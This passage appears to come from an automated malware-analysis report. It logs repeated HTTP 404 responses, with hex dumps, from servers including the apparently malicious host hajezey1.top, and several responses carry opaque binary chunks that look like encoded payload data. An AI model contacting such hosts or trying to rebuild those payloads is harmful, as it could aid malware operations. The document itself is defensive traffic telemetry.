74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 1d 16 4d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 07 74 d2 87 9a 87 cd 2b 80 78 51 a1 a2 8f 3c 65 dd 1c e0 32 02 50 08 a8 da e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 80 20 59 55 11 5c 92 86 64 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 85 92 c9 8a 5c d8 06 0e 45 27 11 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 9c 48 6b 0e e1 a2 22 48 f2 d0 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 
57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b f7 79 8d fb c4 4d c2 ec 5d 4f 5f 5b ff 33 90 5f 84 e2 eb 0b 4a 05 8e 8b a4 d4 ac e4 80 54 fd 17 d2 ea 4f e8 a1 1e c7 1f ab 29 29 8c 97 ad 67 c0 78 b7 bc 72 3f 1a 7c 03 84 5e 85 63 91 5b 07 e9 1f 9d 15 46 a6 b3 58 f1 06 ee 0c 42 de 8b f4 24 eb a8 e1 48 29 e8 74 cc 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f 61 79 b7 9e 96 98 8b 36 19 19 cb 8a f3 d8 04 0f 4e 86 19 7d 6f 37 e3 04 89 3d a4 55 80 90 70 89 9c 2c 4b 6b b6 e2 a2 22 48 d2 d1 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 eb 5f c8 c3 e7 b2 ec 24 1a 0a 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 54 8c f5 0a ef 8b 71 91 e0 35 a3 64 49 e0 76 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa cb f9 b0 72 50 6d ec f0 52 a4 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 d2 ab 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 60 9c 82 4b d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 e3 40 3d 9d 43 cd 17 fe 2f 89 9d f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 7e af da 11 4b 95 36 2a 21 3f 65 74 b0 bb 87 f6 aa 81 de bb a0 69 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 9f 3a 48 93 9f 4e bd 44 ef 5a 89 4f dc ea c0 4a 00 97 af a4 
57 25 11 bb d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 11 e6 cc 64 3d da 9a 56 3a 22 7d e6 d2 1b 62 b9 50 31 eb cd 14 26 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 12 c3 b2 a5 83 41 ab 13 af b8 e8 81 63 a2 57 4a 60 87 bd 5f 6e 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 dc 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OUcScS0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 